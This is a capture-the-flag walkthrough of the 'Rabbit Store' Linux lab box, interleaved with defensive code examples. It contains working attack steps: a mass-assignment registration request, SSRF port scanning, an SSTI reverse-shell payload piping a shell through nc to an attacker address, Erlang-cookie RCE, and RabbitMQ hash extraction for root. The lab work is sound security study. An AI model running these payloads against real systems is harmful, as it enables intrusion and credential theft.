🐰Rabbit Store (Linux)

Demonstrate your web application testing skills and the basics of Linux to escalate your privileges.

Network Enumeration

Nmap

General port scan, then a service scan of the open ports
sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.53.118 -oN puertos
nmap -sCV -p22,80,4369,25672 10.10.53.118 -oN nmap

Nmap result

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://cloudsite.thm/
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
25672/tcp open  unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • cloudsite.thm → add to /etc/hosts

The Erlang Port Mapper Daemon (epmd) is used by default on RabbitMQ and CouchDB installations.

Web Service Enumeration - p80

http://cloudsite.thm

ffuf -u http://cloudsite.thm/FUZZ -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c
  • No results

  • Login/Register → storage.cloudsite.thm

Registration Workflow Analysis

  • Registering a test account redirects to cloudsite.thm/dashboard/inactive

Message on dashboard/inactive

Sorry, this service is only for internal users working within the organization and our clients. If you are one of our clients, please ask the administrator to activate your subscription.

Session Analysis

The session is a JWT stored in a cookie
Cookie: jwt=<jwt>

JWT Auth Bypass?

JWT Decode & Manipulation

Manipulating a claim value
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "email": "[email protected]",
  "subscription": "inactive",
  "iat": 1753981539,
  "exp": 1753985139
}
  • "subscription": "inactive" → "subscription": "active"

(Error: “Invalid Token”: the server verifies the HS256 signature, so a payload edited without the signing key is rejected.)

Exploitation: Mass Assignment - API

PoC

Registration request with an extra subscription parameter
POST /api/register HTTP/1.1
Host: storage.cloudsite.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json
Content-Length: 70
Origin: http://storage.cloudsite.thm
Priority: u=0

{
  "email":"[email protected]",
  "password":"test",
  "subscription": "active"
}

“User registered successfully”

  • Login Redirect → cloudsite.thm/dashboard/active
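The root cause above is mass assignment: the registration handler copies every JSON field into the new account, so a client-supplied subscription overrides the server default. The following is an added example (not the Rabbit Store application's code) contrasting that pattern with an allowlisted handler; the request body and email are constructed to mirror the PoC.

```python
"""Mass assignment in a registration handler: vulnerable vs. hardened.
Added example, not the Rabbit Store application's code; the handler logic is a
constructed model of the behaviour observed in the PoC."""
import json
from typing import Any, Dict

# Constructed request body mirroring the PoC (email is a placeholder).
POC_BODY = '{"email":"test@example.com","password":"test","subscription": "active"}'

# The only client-supplied fields that may influence a new account.
REGISTER_ALLOWLIST = frozenset({"email", "password"})


def register_vulnerable(raw_body: str) -> Dict[str, Any]:
    """Copies every JSON key into the user record, so the client can set
    server-owned fields such as `subscription`."""
    user = {"subscription": "inactive"}      # intended default for new accounts
    user.update(json.loads(raw_body))        # silently overwritten by the client
    return user


def register_hardened(raw_body: str) -> Dict[str, Any]:
    """Accepts only allowlisted keys; server-owned fields keep their defaults.
    Unexpected keys are rejected loudly so probing for hidden fields shows up in logs."""
    data = json.loads(raw_body)
    if not isinstance(data, dict):
        raise ValueError("JSON object expected")
    unexpected = set(data) - REGISTER_ALLOWLIST
    if unexpected:
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    for key in REGISTER_ALLOWLIST:
        if not isinstance(data.get(key), str) or not data[key]:
            raise ValueError(f"missing or invalid field: {key}")
    return {
        "email": data["email"],
        "password": data["password"],   # hash before storing in a real application
        "subscription": "inactive",     # only an administrator may change this
    }


def hardened_rejects(raw_body: str) -> bool:
    """True when the hardened handler refuses the body."""
    try:
        register_hardened(raw_body)
    except ValueError:
        return True
    return False
```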

Access to a New Feature: File Upload

File Upload Analysis

Features:

  • "Upload from Localhost"

  • "Upload from URL"

Upload from Localhost

Success: Image uploaded successfully!

File path: /api/uploads/<string>

  • Filename and extension filtering

Upload from URL

Start a web server to serve a test file
python3 -m http.server
  • Success: the application fetches the file from the attacker-controlled URL.

SSRF vulnerability?

Fuzzing API

Ffuf

ffuf -u http://storage.cloudsite.thm/api/FUZZ -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

Ffuf result

login                   [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 88ms]
register                [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 57ms]
docs                    [Status: 403, Size: 27, Words: 2, Lines: 1, Duration: 64ms]
uploads                 [Status: 401, Size: 32, Words: 3, Lines: 1, Duration: 56ms]
  • /docs - 403 Forbidden

Internal LFI?

Exploitation: SSRF to LFI

Upload from URL

{
    "url":"http://127.0.0.1/api/docs/"
}

Contents of the downloaded file: "Access denied"

Exploitation: SSRF to Internal Port Scanning

Enumerate internal ports with ffuf through the SSRF
ffuf -u "http://storage.cloudsite.thm/api/store-url" \
  -X POST \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=<jwt>" \
  -d '{"url":"http://127.0.0.1:FUZZ"}' \
  -w <(seq 1 65535) \
  -mc all \
  -t 100 \
  -fs 41
  • Ports:

    • 80

    • 3000 → Express? (technology used by the web application)

    • 8000

    • 15672
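The /api/store-url feature fetches whatever URL the client supplies, which is what makes the loopback fetches above possible. As an added example (not the application's code), this is the target validation such an endpoint needs: only public addresses on the standard web ports, with every resolved address checked. Hostnames are resolved through a `resolve` callable so the block runs offline; FAKE_DNS is a constructed resolver table.

```python
"""SSRF guard for an "upload from URL" feature (added example, not the app's code).
Only public addresses on the standard web ports may be fetched; hostnames go
through the `resolve` callable so the block runs offline. FAKE_DNS is constructed."""
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed name table standing in for DNS in the demo and tests.
FAKE_DNS = {"cloudsite.thm": ["10.10.53.118"],
            "example.com": ["93.184.216.34"],
            "rebind.test": ["93.184.216.34", "127.0.0.1"]}


def fake_resolve(host: str) -> Iterable[str]: return FAKE_DNS.get(host, [])


def resolve_all(host: str) -> Iterable[str]:
    """Default resolver: every A/AAAA answer, since any one of them may be used."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    # is_global is False for loopback, RFC 1918, link-local (cloud metadata), reserved.
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url: str,
                       resolve: Callable[[str], Iterable[str]] = resolve_all) -> bool:
    """True only if scheme and port are allowed and every address is public."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:        # user@host confusion
        return False
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:                          # non-numeric or out-of-range port
        return False
    if port not in ALLOWED_PORTS:
        return False
    try:
        ipaddress.ip_address(parts.hostname)    # literal address: check it directly
        addresses = [parts.hostname]
    except ValueError:
        addresses = list(resolve(parts.hostname))   # hostname: check every answer
    return bool(addresses) and all(is_public_address(a) for a in addresses)
```

The address validated here must also be the one the fetcher connects to (pin it, and re-validate on every redirect), otherwise DNS rebinding or an open redirect on a public host walks around the check.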

Exploitation: SSRF to LFI II

Upload from URL

{
    "url":"http://127.0.0.1:3000/api/docs/"
}

Contents of /docs

Endpoints Perfectly Completed

POST Requests:
/api/register - For registering user
/api/login - For loggin in the user
/api/upload - For uploading files
/api/store-url - For uploadion files via url
/api/fetch_messeges_from_chatbot - Currently, the chatbot is under development. Once development is complete, it will be used in the future.

GET Requests: 
/api/uploads/filename - To view the uploaded files
/dashboard/inactive - Dashboard for inactive user
/dashboard/active - Dashboard for active user

Note: All requests to this endpoint are sent in JSON format.

API Endpoint Analysis

  • GET /api/fetch_messeges_from_chatbot → "GET method not allowed"

  • POST /api/fetch_messeges_from_chatbot → 500 ERROR

JSON dummy data
{
    "uwu":"uwu"
}
Excessive Data in Response
{
  "error": "username parameter is required"
}
username parameter
{
    "username":"admin"
}
Value reflected in the response
Sorry, admin, our chatbot server is currently under development.

SSTI Test

{
    "username":"{{7*7}}"
}
Response
Sorry, 49, our chatbot server is currently under development.

SSTI Vulnerability

Vulnerable code example (user input concatenated into the template source instead of passed as a variable)

$output = $template->render("Hi " . $_GET['name']);
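From the defender's side, the `{{7*7}}` probe and the later payload are visible in request bodies before any response leaks. The following is an added detection example, not part of the original writeup: it scans constructed log lines of the form `<ip> <method> <path> <json body>` and flags JSON string values that carry template syntax, separating arithmetic probes from attribute-walking escape attempts.

```python
"""Spotting SSTI probes in chatbot request bodies (added detection example, not
part of the writeup). It scans constructed log lines `<ip> <method> <path> <json>`
and flags JSON string values carrying template syntax, as the {{7*7}} probe would."""
import json
import re
from typing import Dict, List

# Delimiters of common engines: Jinja2/Twig, ERB/JSP, Freemarker/JS templates, Ruby.
TEMPLATE_MARKERS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|<%.*?%>|\$\{.*?\}|#\{.*?\}", re.S)
# Attribute walking such as __class__/__globals__ marks an escape attempt, not a probe.
DUNDER_ACCESS = re.compile(r"__\w+__")

# Constructed sample log (request-body logging on the API gateway is assumed).
SAMPLE_LOG = """\
10.0.0.5 POST /api/fetch_messeges_from_chatbot {"username":"admin"}
10.0.0.5 POST /api/fetch_messeges_from_chatbot {"username":"{{7*7}}"}
10.0.0.5 POST /api/fetch_messeges_from_chatbot {"username":"{{ config.__class__.__init__.__globals__ }}"}
10.0.0.9 POST /api/register {"email":"a@example.com","password":"${x}"}
10.0.0.7 POST /api/login {"email":"b@example.com","password":"hunter2"}
"""


def string_values(obj) -> List[str]:
    """Flattens every string leaf of a parsed JSON document."""
    if isinstance(obj, str):
        return [obj]
    if isinstance(obj, dict):
        obj = list(obj.values())
    return [s for v in obj for s in string_values(v)] if isinstance(obj, list) else []

def classify_body(body: str) -> str:
    """'none', 'probe' (template delimiters) or 'escape' (delimiters + dunder access)."""
    try:
        values = string_values(json.loads(body))
    except ValueError:
        values = [body]                           # malformed JSON: scan the raw text
    hits = [m.group(0) for v in values for m in TEMPLATE_MARKERS.finditer(v)]
    if not hits:
        return "none"
    return "escape" if any(DUNDER_ACCESS.search(h) for h in hits) else "probe"

def scan_log(text: str) -> List[Dict[str, str]]:
    """One finding per suspicious line: source ip, path and verdict."""
    findings = []
    for line in text.splitlines():
        ip, _method, path, body = line.split(" ", 3)
        verdict = classify_body(body)
        if verdict != "none":
            findings.append({"ip": ip, "path": path, "verdict": verdict})
    return findings
```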

Exploitation: SSTI to RCE

Set up a listener
nc -lvnp <port>
Reverse shell SSTI payload in the username parameter
{
    "username":"{{ config.__class__.__init__.__globals__['os'].system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f') }}"
}

System Intrusion

Shell: azrael

Post-Intrusion Enumeration

Suspicious service

4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672

Resource

If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start.

Looking for the cookie
cat ~/.erlang.cookie
cat /.erlang.cookie
find / -type f -name erlang.cookie 2>/dev/null
  • No cookie

find / -name erlang 2>/dev/null
  • /usr/lib/erlang → No cookie

Resource

The global erlang cookie file is typically in /var/lib/rabbitmq/.erlang.cookie

  • Cookie leak!

Searching for an exploit in Metasploit
msfconsole
metasploit > search erlang cookie
  • exploit/multi/misc/erlang_cookie_rce

Privilege Escalation

Shell: rabbitmq

Privilege Escalation II: RabbitMQ - Schema Definition Export

RabbitMQ Manual

List the existing users
rabbitmqctl list_users

error: cookie file must be accessible by owner only

Set owner-only permissions on the cookie
chmod 400 /var/lib/rabbitmq/.erlang.cookie
rabbitmqctl list_users
  • Administrator

The password for the root user is the SHA-256 hashed value of the RabbitMQ root user's password. Please don't attempt to crack SHA-256.

Creating a new administrator user

Resource

Create the user and grant permissions
rabbitmqctl add_user uwu uwu
rabbitmqctl set_permissions -p / uwu ".*" ".*" ".*"
rabbitmqctl set_user_tags uwu administrator

Exporting the admin hash

rabbitmqadmin export rabbit.definitions.json -u uwu -p uwu
cat rabbit.definitions.json

RabbitMQ Password Cracking

Resource

Reformat the RabbitMQ hash (base64 of 4-byte salt followed by the SHA-256 digest) into digest:salt form
echo <base64 rabbitmq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash
  • Root hash
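The one-liner above relies on the layout of RabbitMQ's default SHA-256 password hash: base64 of a 4-byte salt followed by SHA-256(salt || UTF-8 password), which is why the first 8 hex characters are moved to the end. As an added example (not part of the writeup or of RabbitMQ), this reproduces that layout and a verifier for it, useful when auditing exported definitions; the password and salt are constructed.

```python
"""RabbitMQ SHA-256 password hash layout (added example, not RabbitMQ's own code).
rabbit_password_hashing_sha256 stores base64( salt(4 bytes) || SHA-256(salt || pw) ).
Password and salt used in the demo are constructed."""
import base64
import hashlib
import hmac
import os
from typing import Optional


def rabbitmq_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Produces a hash in the rabbit_password_hashing_sha256 format."""
    salt = os.urandom(4) if salt is None else salt
    if len(salt) != 4:
        raise ValueError("RabbitMQ uses a 32-bit salt")
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return base64.b64encode(salt + digest).decode("ascii")


def verify_rabbitmq_hash(password: str, stored: str) -> bool:
    """Recomputes the digest with the stored salt and compares in constant time."""
    try:
        raw = base64.b64decode(stored, validate=True)
    except (ValueError, TypeError):
        return False
    if len(raw) != 4 + 32:                     # salt + SHA-256 digest
        return False
    salt, digest = raw[:4], raw[4:]
    candidate = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return hmac.compare_digest(candidate, digest)


def to_digest_colon_salt(stored: str) -> str:
    """Same reordering as the perl one-liner: '<64 hex digest>:<8 hex salt>'."""
    raw = base64.b64decode(stored)
    if len(raw) != 36:
        raise ValueError("not a RabbitMQ SHA-256 hash")
    return raw[4:].hex() + ":" + raw[:4].hex()
```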

su root
> <hash>

System Compromise

Shell: Root
